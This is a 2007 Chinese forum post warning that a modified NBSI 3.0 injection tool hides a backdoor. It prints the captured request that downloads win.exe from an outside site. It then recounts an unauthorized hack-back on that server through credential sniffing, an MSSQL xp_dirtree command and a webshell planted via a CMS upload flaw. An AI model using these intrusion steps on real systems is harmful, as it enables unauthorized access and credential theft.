nbsi3.0,用了NBSI3.0Hack520增强版的请进来看!!!软件中被人

用了NBSI3.0Hack520增强版的请进来看!!!软件中被人 - 电脑安全 - 电脑教程网

用了NBSI3.0Hack520增强版的请进来看!!!软件中被人

日期:2007-10-02   荐:
  首先,BS一下放后门的人,事实上是谁捆了,我们几个人也已经该知道,也不想说了,他的人品大家都知道....   工具可以在黑鹰基地下载(http://www3.3800cc.com/Soft/gjgj/11115.html华北资源在线 ).下面的文章记录昨天我们(小刀,茶茶,小莫)反攻的全过程.   刚拿到工具那天我就开始抓包分析工具哪些变化,例如加了getwebshell功能.   抓包的时候,发现突然多了一条路径,向一个网站下载一个.exe文件,当时没在意,之后突然发现自己向外的   数据包很大,这个时候茶茶在群里说nbsi 3.0有后门,于是几个人开始渗透过来. 数据包: GET /mp3/win.exe HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322) Host: www.6xwg.com Connection: Keep-Alive www.6xwg.com 也就是nbsi后门转向的站点.   我们几个人分工,两个对网段进行扫描,另外两个对主机进行旁入.   旁入拿shell很容易就拿下,过程略,后来又在同网段下拿了台sa的肉鸡,   tracert www.6xwg.com   直接返回IP说明可以嗅.   茶茶和刀刀两个负责嗅,而我继续旁入,服务器的权限配置BT,想通过旁注很难.   这时茶茶嗅到一堆dbo权限的mssql账号,还有一堆ftp账号和密码. www.6xwg.com 又开了1433,直接本地连接. exec master..xp_dirtree "d:/",1,1   从旁入的信息和分析得到路径,接着备份一个shell,但是备出来老出现%>无法毕合,又换备php小马.   但php小马又出现超时,再翻了翻他的路径,找到一个旧的动易程序,有上传漏洞,刚刚好上去.   接着到那个mp3目录下,发现了一堆网马,为了测试,我们配了一个pcshare,然后我们运行nbsi 3.0   刀刀告诉我,我们几个全部上线了,之后,我通知了xiaolu,还有一些好友,还包括中标的人(查后门中标的人).接着做了这个证明动画.   好了,不多说了,具体怎么想大家自己去想吧,这里再次BS捆后门的人.   请使用过此工具的人注意,最好重做系统吧,不知道那个pc有没有做过免杀!!! 【
标签: